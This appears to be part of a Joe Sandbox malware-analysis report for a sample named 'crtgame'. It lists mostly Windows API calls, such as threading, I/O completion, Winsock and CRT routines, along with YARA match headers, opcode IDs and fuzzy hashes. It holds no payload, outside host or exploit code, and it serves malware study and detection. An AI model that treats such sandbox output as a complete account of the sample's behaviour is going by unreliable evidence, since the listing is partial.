                                                                                    • Instruction Fuzzy Hash: 7C314AB1D013059FCB10DF65C444AAABBF8FF48314F14455EE849D7641EB74A604CFA0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C421DA
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C421ED
                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C42224
                                                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C42237
                                                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C42261
                                                                                      • Part of subcall function 02C42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42350
                                                                                      • Part of subcall function 02C42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42360
                                                                                      • Part of subcall function 02C42341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C42370
                                                                                      • Part of subcall function 02C42341: GetLastError.KERNEL32 ref: 02C4237A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1856819132-0
                                                                                    • Opcode ID: 91763e22e1f5c9e37f6a3e7c76f4575dbab528112a4fa1605ea47a349790c4e4
                                                                                    • Instruction ID: a95e767100734d968c7b2aebebb1801bf34332d4227cd5b3ac8f523d2f9c390a
                                                                                    • Opcode Fuzzy Hash: 91763e22e1f5c9e37f6a3e7c76f4575dbab528112a4fa1605ea47a349790c4e4
                                                                                    • Instruction Fuzzy Hash: B3115C72D542189BCB219FA5D8086AFFBBAFB44314F004A1AEC1592260DB718654DBD1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4229D
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C422B0
                                                                                    • TlsGetValue.KERNEL32 ref: 02C422E7
                                                                                    • TlsSetValue.KERNEL32(?), ref: 02C42300
                                                                                    • TlsSetValue.KERNEL32(?,?,?), ref: 02C4231C
                                                                                      • Part of subcall function 02C42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42350
                                                                                      • Part of subcall function 02C42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42360
                                                                                      • Part of subcall function 02C42341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C42370
                                                                                      • Part of subcall function 02C42341: GetLastError.KERNEL32 ref: 02C4237A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1856819132-0
                                                                                    • Opcode ID: f88add4f8440111c0e60c8810a4046600f23431c40859a82789a83e92f079731
                                                                                    • Instruction ID: fe655c2a6f240b747d468ae2c969179656bf3b94cf67cb6ec6d06746563b21fa
                                                                                    • Opcode Fuzzy Hash: f88add4f8440111c0e60c8810a4046600f23431c40859a82789a83e92f079731
                                                                                    • Instruction Fuzzy Hash: C9112B72D50219ABCB119FA5E8446AEFFBAFF48314F00496AE804E3250DB718A65DFD1
                                                                                    APIs
                                                                                      • Part of subcall function 02C4AAEE: __EH_prolog.LIBCMT ref: 02C4AAF3
                                                                                    • __CxxThrowException@8.LIBCMT ref: 02C4B6B8
                                                                                      • Part of subcall function 02C53F5A: RaiseException.KERNEL32(?,?,?,02C70F6C,?,00000400,?,?,?,02C5359C,?,02C70F6C,00000000,00000001), ref: 02C53FAF
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02C71DA4,?,00000001), ref: 02C4B6CE
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C4B6E1
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02C71DA4,?,00000001), ref: 02C4B6F1
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C4B6FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                    • String ID:
                                                                                    • API String ID: 2725315915-0
                                                                                    • Opcode ID: 002187b2d838801bc269c70d288a36c76040ab86a59f11a082f006c58f688c46
                                                                                    • Instruction ID: 0c4499730f27e04340429b2d48a615b09b79d1f21201753ee4b92570da9130c1
                                                                                    • Opcode Fuzzy Hash: 002187b2d838801bc269c70d288a36c76040ab86a59f11a082f006c58f688c46
                                                                                    • Instruction Fuzzy Hash: A50181B2A40204BFDB10DBA5DC8DF97B7ADEB04759B004A55F615D7290DB61E8148B70
                                                                                    APIs
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C42432
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C42445
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C42454
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C42469
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C42470
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 747265849-0
                                                                                    • Opcode ID: 48f7e54c4d1ee6aab88844267ab79995a012c05455510b3110072500af567c83
                                                                                    • Instruction ID: c17e189e97f1fd1f1805615af53b24da49938d408070616d2ad08b8a57f5715c
                                                                                    • Opcode Fuzzy Hash: 48f7e54c4d1ee6aab88844267ab79995a012c05455510b3110072500af567c83
                                                                                    • Instruction Fuzzy Hash: 0DF03072640204BFDA10ABA1ED8DFD7B72CFB44715F800951F701D6481DB61A628CBF1
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 02C41ED2
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C41EEA
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C41EF9
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C41F0E
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C41F15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 830998967-0
                                                                                    • Opcode ID: 1f3889a0b3d44742d98002d179cf3eacea2901caa73d6dab8b17824c6f4243b5
                                                                                    • Instruction ID: 4f73ffdf3af4554c183820f6c2b3ba4fd79277c32fd4ab522c496265256e98ae
                                                                                    • Opcode Fuzzy Hash: 1f3889a0b3d44742d98002d179cf3eacea2901caa73d6dab8b17824c6f4243b5
                                                                                    • Instruction Fuzzy Hash: 40F01772641605BFDB01AFA2ED88FC7BB6CFB44759F000912F60182841DB61AA698BF0
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?), ref: 02C430C3
                                                                                    • WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02C43102
                                                                                    • _memcmp.LIBCMT ref: 02C43141
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressErrorLastString_memcmp
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 1618111833-2422070025
                                                                                    • Opcode ID: c3bf3c3e9567f250d2cdbc4551cec6e62c1bd19227ceff9a5033940670caf107
                                                                                    • Instruction ID: f6df3acaf2b280a785d86164bd99797b6fbb6cd0449a27b6e14ae3246afda797
                                                                                    • Opcode Fuzzy Hash: c3bf3c3e9567f250d2cdbc4551cec6e62c1bd19227ceff9a5033940670caf107
                                                                                    • Instruction Fuzzy Hash: 6E31C7719003589FDB209F64CC8476FB7A5FFC5324F2049A9EC5597280EB719A45CB94
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C41F5B
                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C41FC5
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 02C41FD2
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                    • String ID: iocp
                                                                                    • API String ID: 998023749-976528080
                                                                                    • Opcode ID: 939ce0c8f261096a99eca1d24f5cde15e0240e9b7f99a17fcf25bfe56a71a120
                                                                                    • Instruction ID: e8976f1cbc608f34b802a23bd600083466b0e025d4c163ecc4dee8b2854f7edd
                                                                                    • Opcode Fuzzy Hash: 939ce0c8f261096a99eca1d24f5cde15e0240e9b7f99a17fcf25bfe56a71a120
                                                                                    • Instruction Fuzzy Hash: 7D21B4B1901B449FC720DF6AD54455BFBF8FF94720B108A1FD8A693A90D7B0A644CF91
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 02C53564
                                                                                      • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
                                                                                      • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
                                                                                      • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
                                                                                    • std::exception::exception.LIBCMT ref: 02C53582
                                                                                    • __CxxThrowException@8.LIBCMT ref: 02C53597
                                                                                      • Part of subcall function 02C53F5A: RaiseException.KERNEL32(?,?,?,02C70F6C,?,00000400,?,?,?,02C5359C,?,02C70F6C,00000000,00000001), ref: 02C53FAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                    • String ID: bad allocation
                                                                                    • API String ID: 3074076210-2104205924
                                                                                    • Opcode ID: b5179fe9084422006b8362cc55d9f2d4c0be8f9116d61f4f389e3a2515170696
                                                                                    • Instruction ID: b27f5091e5c2b7f8056ffe58c3c731aa063ebb85a0fe4df29ec1d28ae1d21404
                                                                                    • Opcode Fuzzy Hash: b5179fe9084422006b8362cc55d9f2d4c0be8f9116d61f4f389e3a2515170696
                                                                                    • Instruction Fuzzy Hash: 3EE0A07050026AAADF00EEA4CC489AFBBB9AB00340F8005D5EC14A6180DB71D794DAE9
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C437B6
                                                                                    • __localtime64.LIBCMT ref: 02C437C1
                                                                                      • Part of subcall function 02C52000: __gmtime64_s.LIBCMT ref: 02C52013
                                                                                    • std::exception::exception.LIBCMT ref: 02C437D9
                                                                                      • Part of subcall function 02C51ED3: std::exception::_Copy_str.LIBCMT ref: 02C51EEC
                                                                                      • Part of subcall function 02C49EB1: __EH_prolog.LIBCMT ref: 02C49EB6
                                                                                      • Part of subcall function 02C49EB1: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C49EC5
                                                                                      • Part of subcall function 02C49EB1: __CxxThrowException@8.LIBCMT ref: 02C49EE4
                                                                                    Strings
                                                                                    • could not convert calendar time to UTC time, xrefs: 02C437CE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                    • String ID: could not convert calendar time to UTC time
                                                                                    • API String ID: 1963798777-2088861013
                                                                                    • Opcode ID: 3b647d9c9220c77a6ed5e3269d369b2ae2ef8b88520b7c3c2a950b917566116a
                                                                                    • Instruction ID: 8cbf1e0bfcad47bc60042040409e308b5690e3420a3d7504761e27d20a07763b
                                                                                    • Opcode Fuzzy Hash: 3b647d9c9220c77a6ed5e3269d369b2ae2ef8b88520b7c3c2a950b917566116a
                                                                                    • Instruction Fuzzy Hash: 2AE06DF1D0015A9BCB14EF90D988BBFB779EF00340F104599DC15A2240DB749609DF84
                                                                                    APIs
                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C44149), ref: 02C50DBF
                                                                                      • Part of subcall function 02C43FDC: __EH_prolog.LIBCMT ref: 02C43FE1
                                                                                      • Part of subcall function 02C43FDC: CreateEventA.KERNEL32(00000000,02C4A5C3,?,00000000), ref: 02C43FF3
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C50DB4
                                                                                    • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C44149), ref: 02C50E00
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C44149), ref: 02C50ED1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$Event$CreateH_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 2825413587-0
                                                                                    • Opcode ID: e4abd94aeeec079c93da6322b228fd8cbe544003052db22f9c0568de567fa88b
                                                                                    • Instruction ID: 168be4066cf1720d0830baafa560a57ab68d8b8a90cab0e80f41253401d9301b
                                                                                    • Opcode Fuzzy Hash: e4abd94aeeec079c93da6322b228fd8cbe544003052db22f9c0568de567fa88b
                                                                                    • Instruction Fuzzy Hash: FD51C4715007558BDB11DF28C88479ABBE4FF88328F290618ECA9D7390DB35E985CF99
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C5F94B
                                                                                    • __isleadbyte_l.LIBCMT ref: 02C5F979
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02C5F9A7
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02C5F9DD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: 3081d72aba2c45bad4f69de3fe4cd512031a76ff66d898f4cee85ab7e679be45
                                                                                    • Instruction ID: c76d61ca43c89a3b2b515c77b71e4b4c2225ebe627ef767f6a1259e8cb0b7952
                                                                                    • Opcode Fuzzy Hash: 3081d72aba2c45bad4f69de3fe4cd512031a76ff66d898f4cee85ab7e679be45
                                                                                    • Instruction Fuzzy Hash: A5313F31600A66BFDF298E35C884BBA7BA5FF82314F15452DEC6087590E330E9D0DB88
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 02C5FDB0
                                                                                      • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
                                                                                      • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
                                                                                      • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_malloc
                                                                                    • String ID:
                                                                                    • API String ID: 501242067-0
                                                                                    • Opcode ID: 6c973406437d58c7ee02c989671d9ca3b8ee2dfa736c6652552feae2ee164acb
                                                                                    • Instruction ID: dce192e82d4690b7cfcc4f7ca6ce9de5e7b40558f5345fe0f34679ae0c42a8bc
                                                                                    • Opcode Fuzzy Hash: 6c973406437d58c7ee02c989671d9ca3b8ee2dfa736c6652552feae2ee164acb
                                                                                    • Instruction Fuzzy Hash: 42115C32840631ABCF292F71AC0875E379A9F023A4F10092DED4D96681DB74C5D0DAEC
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C51D92
                                                                                    • ___ascii_stricmp.LIBCMT ref: 02C51DCA
                                                                                    • __tolower_l.LIBCMT ref: 02C51DE0
                                                                                      • Part of subcall function 02C5537A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C55388
                                                                                      • Part of subcall function 02C5537A: __isctype_l.LIBCMT ref: 02C553A9
                                                                                    • __tolower_l.LIBCMT ref: 02C51DEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
                                                                                    • String ID:
                                                                                    • API String ID: 2995433114-0
                                                                                    • Opcode ID: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                                    • Instruction ID: 238b208b62ea1927c370606ad72bfe7c36b8936e5a85537e872dc60a887d6f23
                                                                                    • Opcode Fuzzy Hash: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                                    • Instruction Fuzzy Hash: AA110D329001756FD711AA69C88CB7A77A5AB41265F5C0258DC2957180EBF0DE80D6D4
                                                                                    APIs
                                                                                    • htons.WS2_32(?), ref: 02C43DA2
                                                                                      • Part of subcall function 02C43BD3: __EH_prolog.LIBCMT ref: 02C43BD8
                                                                                      • Part of subcall function 02C43BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C43BED
                                                                                    • htonl.WS2_32(00000000), ref: 02C43DB9
                                                                                    • htonl.WS2_32(00000000), ref: 02C43DC0
                                                                                    • htons.WS2_32(?), ref: 02C43DD4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                    • String ID:
                                                                                    • API String ID: 3882411702-0
                                                                                    • Opcode ID: 262f59a5c93cddd4a66590d4009b29cdea9d682cdcdc7fefd36123449865f293
                                                                                    • Instruction ID: 34444227ea26e13d91d7a7c4b301688d319c470f90ca52967d5d79a4267efaca
                                                                                    • Opcode Fuzzy Hash: 262f59a5c93cddd4a66590d4009b29cdea9d682cdcdc7fefd36123449865f293
                                                                                    • Instruction Fuzzy Hash: 0511E135A00248EFCF019F64D889A5AB7B9FF48314F1089A6FD08DF200DB71DA18CBA1
                                                                                    APIs
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02C4335F,?,?,?,?,?), ref: 02C423D0
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C423DE
                                                                                    • InterlockedExchange.KERNEL32(00000030,00000001), ref: 02C42401
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C42408
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 4018804020-0
                                                                                    • Opcode ID: c05f35864fc3bbfdb8d61096e1f3e7736a64248f3ea6f2e585653c7f3a9c7d64
                                                                                    • Instruction ID: c7bada42d87c0f639d6312f2b2ddf904d46aa5c083620e07fd5bd80d0840abeb
                                                                                    • Opcode Fuzzy Hash: c05f35864fc3bbfdb8d61096e1f3e7736a64248f3ea6f2e585653c7f3a9c7d64
                                                                                    • Instruction Fuzzy Hash: 2D11CE32600204AFDB209F61C985B67BBBCFF40708F1008ADFA019B140DBB1FA45CBA1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                    • Instruction ID: f3e6d5c18df1fa39cc82c0b01bf053a785fc6a1d046626ddf1df86c2cf350bf2
                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                    • Instruction Fuzzy Hash: A5014B3204025ABBCF126ED4CC418EE3F22BB59754B498416FE1899031D736CAB1AB85
                                                                                    APIs
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C424A9
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C424B8
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C424CD
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C424D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 4018804020-0
                                                                                    • Opcode ID: 6339a32ef3d652d6d30a719e770062e386aca1b2e4b3d60e0e6d95001760e3cf
                                                                                    • Instruction ID: e4895ab2fa5891fa232850666a13950e978db4c2b3ab6c1c4f2dd140b79841fe
                                                                                    • Opcode Fuzzy Hash: 6339a32ef3d652d6d30a719e770062e386aca1b2e4b3d60e0e6d95001760e3cf
                                                                                    • Instruction Fuzzy Hash: F5F03C72640204BFDB00AF66EC88F9ABBACFF48714F004915FA04C6142D771E6648FA1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C42009
                                                                                    • RtlDeleteCriticalSection.NTDLL(?), ref: 02C42028
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C42037
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C4204E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                    • String ID:
                                                                                    • API String ID: 2456309408-0
                                                                                    • Opcode ID: e9e400e086f6831b683e3e158968fc0b1d0ec56fb1b00fc9e4fb9dd9e07ea7a3
                                                                                    • Instruction ID: d2f4aa70015ca6f771ea5626f08841db7c165226aa00246c5bd4a9f2f4cedc5b
                                                                                    • Opcode Fuzzy Hash: e9e400e086f6831b683e3e158968fc0b1d0ec56fb1b00fc9e4fb9dd9e07ea7a3
                                                                                    • Instruction Fuzzy Hash: A201DC719006049BC739AF64E84CBABFBF4EF04309F004A5DE84682990CF74A68CDFA5
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$H_prologSleep
                                                                                    • String ID:
                                                                                    • API String ID: 1765829285-0
                                                                                    • Opcode ID: a466158d2207474e33648932f58bd7e0b7f75e15672374a3631fc4dd9613642c
                                                                                    • Instruction ID: d6ecaa902ddf11f1cfc60548f26344495ed3fa3231b3b752bbaa128236c14bbd
                                                                                    • Opcode Fuzzy Hash: a466158d2207474e33648932f58bd7e0b7f75e15672374a3631fc4dd9613642c
                                                                                    • Instruction Fuzzy Hash: 6CF05435A40110EFCB109F94D8CCB98BBA4FF0D311F1086A9F519DB290CB359854CBA1
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C47D5C,?,?,00000000), ref: 02C49059
                                                                                    • getsockname.WS2_32(?,?,?), ref: 02C4906F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastgetsockname
                                                                                    • String ID: &'
                                                                                    • API String ID: 566540725-655172784
                                                                                    • Opcode ID: f4418077ad7b20069541d419c75ae0a134ca5e14655a2a062ff99ef54479b171
                                                                                    • Instruction ID: e9af730b8703813e8afdc76c987438126aff318c14b4c30c24ad69a9654995d0
                                                                                    • Opcode Fuzzy Hash: f4418077ad7b20069541d419c75ae0a134ca5e14655a2a062ff99ef54479b171
                                                                                    • Instruction Fuzzy Hash: D7215172A00218DBDB10DF68D844ADFB7F5FF4C324F10856AE918EB281EB30E9458B94
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4C63D
                                                                                      • Part of subcall function 02C4CC19: std::exception::exception.LIBCMT ref: 02C4CC48
                                                                                      • Part of subcall function 02C4D3D2: __EH_prolog.LIBCMT ref: 02C4D3D7
                                                                                      • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
                                                                                      • Part of subcall function 02C4CC78: __EH_prolog.LIBCMT ref: 02C4CC7D
                                                                                    Strings
                                                                                    • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C4C673
                                                                                    • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C4C67A
